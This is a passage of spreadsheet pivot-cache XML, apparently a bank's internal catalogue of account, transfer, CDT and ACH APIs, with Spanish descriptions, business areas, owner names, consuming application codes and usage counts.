    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v=""/>
    <m/>
    <s v="ALM_AW0955 _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ LoansOffer_NU0102001"/>
    <n v="4581"/>
    <n v="3"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Fund Transfers"/>
    <n v="112"/>
    <s v="account-fund-transfers"/>
    <s v="La API Account - Fund Transfers habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos segíºn se requiera. Para las capacidades de crédito a cuenta y transferencia entre cuentas, se valida si la cuenta tiene alguna restricción como cuenta recaudadora."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="6"/>
    <m/>
    <m/>
    <n v="6"/>
    <n v="403"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-10T01:14:58"/>
    <s v="Accounts"/>
    <n v="130"/>
    <s v="Account - Information"/>
    <n v="112"/>
    <s v="account-information"/>
    <s v="Permite consultar la información general de las cuentas de un cliente y las tarjetas asociadas a las cuentas. Información como saldos, estados, plazos, montos, entre otros"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Depositós"/>
    <s v="APP Cayman _x000d__x000a_ Cayman_Soporte _x000d__x000a_ TMP EDIN APP_AW1276001 _x000d__x000a_ TEMP MAM_AW1204 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ TMP1 johucorr_AW0360010 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="698"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-23T19:01:50"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Management"/>
    <n v="143"/>
    <s v="account-management"/>
    <s v="Habilita las capacidades relacionadas con la gestión administrativa de una cuenta de depósito como, por ejemplo: la apertura de una cuenta de ahorros, realizar modificaciones sobre su estado, disponibilidad de saldos y confirmar información proporcionada sobre las cuentas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="GestionDeCuentasDepositos/V1.0"/>
    <s v="Depositós"/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="9172"/>
    <n v="2808"/>
    <n v="2431"/>
    <n v="485767"/>
    <n v="722877"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Offers"/>
    <n v="113"/>
    <s v="account-offers"/>
    <s v="La API Account - Offers permite consultar la información de la oferta que ofrece el producto de depósitos como por ejemplo los planes actuales para cuentas de ahorro y corriente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="OfertaCuentasDepositos/V1.0"/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="3106"/>
    <n v="2898"/>
    <n v="2524"/>
    <n v="2234"/>
    <n v="3563"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-23T19:01:50"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Participants"/>
    <n v="114"/>
    <s v="account-participants"/>
    <s v="Esta Api lista los benefiarios que tiene una cuenta de un cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaCuentasDepositos/V1.0"/>
    <s v="Depositós"/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="2978"/>
    <n v="2779"/>
    <n v="2425"/>
    <n v="2122"/>
    <n v="3449"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Taxes"/>
    <n v="112"/>
    <s v="account-taxes"/>
    <s v="El API Account - Taxes permitirá marcar y desmarcar cuentas para que sean o no exentas del impuesto GMF (Gravamen a movimientos financieros). También permite consultar la marcación de la cuenta GMF"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaGMF/V1.0"/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="2964347"/>
    <n v="2820676"/>
    <n v="2716439"/>
    <n v="2794985"/>
    <n v="3217680"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Transfers"/>
    <n v="122"/>
    <s v="account-transfers"/>
    <s v="Habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos segíºn se requiera."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="TransferenciasCuentasDepositos/V1.0"/>
    <m/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="7050"/>
    <n v="8620"/>
    <n v="5797"/>
    <n v="4737"/>
    <n v="7647"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-05-11T17:46:32"/>
    <s v="Accounts Foreign Branches"/>
    <n v="110"/>
    <s v="Accounts Foreign Branches - Account Balances"/>
    <n v="110"/>
    <s v="accounts-foreign-branches-account-balances"/>
    <s v="La API Accounts Foreign Branches - Account Balances permite conocer los saldos consolidados de todos los tipos de productos que poseea un cliente en las filiales de exterior de Bancolombia. Los tipos de producto que maneja Finacle para las filiales del exterior son los siguientes: CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosConsolidadosFiliales/V1.0_x000a_ConsultaSaldosProductosConsolidados/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-24T17:02:16"/>
    <s v="Accounts Reconciliation"/>
    <n v="100"/>
    <s v="Accounts Reconciliation - Reconciliation Data Query"/>
    <n v="200"/>
    <s v="accounts-reconciliation-data-query"/>
    <s v="Api que permite  consultar a través de la identificación de un cliente, la información básica de las obligaciones, como lo es el numero de la obligacioó y el tipo de producto, ademas con las obligaciones se puede consultar los abogados que estan gestionando dichas obligaciones"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="GestionConciliacionClientes/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <m/>
    <n v="41"/>
    <n v="754"/>
    <n v="12804"/>
    <n v="65709"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-25T16:19:02"/>
    <s v="ACHFulfillment"/>
    <n v="100"/>
    <s v="ACHFulfillment - Transfers"/>
    <n v="100"/>
    <s v="achfulfillment-transfers"/>
    <s v="La API ACH Fulfillment - Transfers permitirá gestionar las operaciones asociadas a otros  bancos a traves del sistema ACH, las operaciones que se podran realizar a traves de esta API son las siguientes: - Inscribir beneficiario de otro banco para realizar transferencias - Realizar envio de transferencias a otros bancos - Anular transferencia a otros bancos"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="TransferenciasOtrosBancos/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Activar Acuerdo Trade"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ActivarAcuerdoTrade proporciona la capacidad de negocio de apertura de productos de comercio internacional. Estos productos se agrupan en tres grandes categorías. Cartas de Crédito, Garantías Bancarias y Cobranzas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0611001 _x000d__x000a_AW0795"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Activar CDT"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Certificado de Depósito a Término (CDT), es un título valor en el cual el inversionista nos deposita su dinero a un plazo, a una tasa y a una forma de pago determinada, información que será recibida por el servicio de ActivarCDT_x005f_x000D_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="SU2 _x000d__x000a_CDT _x000d__x000a_AW0210001 _x000d__x000a_SVP _x000d__x000a_SU5 _x000d__x000a_SVE _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion Combo Dinamico"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Administración Combo Dinámico permitirá a los consumidores consultar los combos que un cliente tiene asociados, los combos de un cliente filtrados por un producto particular, la consulta de un combo en particular y la modificación de información del combo asociada a la apertura de los productos del combo"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_Servicio_AW0623001"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion Convenios Cartera"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Administración Convenios Cartera tiene como objetivo permitir inicialmente la consulta de los diferentes tipos de convenios de cartera que existen como convenios de libranza, de seguros, DAI, ONG´s o fundaciones, etc. Más adelante se espera que el servicio pueda ir creciendo para permitir la creación, bloqueo y cancelación de un convenio de cartera."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion ITC"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite el registro de transacciones en ITC (Información Transaccional de Clientes). Las transacciones reportadas a través de este servicio se verán reflejadas en los archivos consolidados de ITC un día después de la aplicación de la transacción._x005f_x000D_ "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="ITC -  Información Transaccional de Clientes_Reportajes_ISITC0003"/>
    <s v="AW1165"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administracion Relacion Cliente Producto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La relación cliente producto permite conocer y asociar cuales son los productos de un cliente . Este servicio permite ejecutar todas las acciones de mantenimiento de esta relación tales como: asociar un producto, actualizar una asociación, eliminar una asociación."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="NU0147001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administrar CDT"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como propósito recuperar la información de un producto a partir de un número de CDT valido o los títulos de un cliente a partir del número y tipo de identificación."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="SU2 _x000d__x000a_AW0210001 _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_SU5 _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Administrar Firma Documento"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Administrar Firma Documento"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-19T14:54:45"/>
    <s v="Administrative Module"/>
    <n v="101"/>
    <s v="Administrative Module - File Notification"/>
    <n v="101"/>
    <s v="administrative-module-file-notification"/>
    <s v="En esta API se incluirán las diferentes funcionalidades que impliquen el envió de notificaciones hacia el módulo administrativo."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-22T08:13:11"/>
    <s v="Administrative Module"/>
    <n v="110"/>
    <s v="Administrative Module  Notifications"/>
    <n v="110"/>
    <s v="tec-administrative-module-notifications"/>
    <s v="En esta API se incluirán las diferentes funcionalidades que impliquen el envió de notificaciones hacia el módulo administrativo."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ BilleteraMovil_AW1190001"/>
    <n v="2"/>
    <n v="4"/>
    <n v="2632"/>
    <n v="3818"/>
    <n v="144415"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Adquirir Producto Seguro"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Adquirir Producto Seguro"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectacion Monetaria AFC"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en AFC, relacionados con la transaccionalidad de Cuentas de Ahorro para el Fomento a la Construcción:_x005f_x000D_ _x005f_x000D_ - grabarPate _x005f_x000D_ - debitarCuenta"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="SAI _x000d__x000a_AFC _x000d__x000a_SUC _x000d__x000a_GOLF _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectacion Monetaria Cuentas ACH"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Transacción encargada de realizar transferencias entre cuentas Depósitos a cuentas ACH (Otros Bancos)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
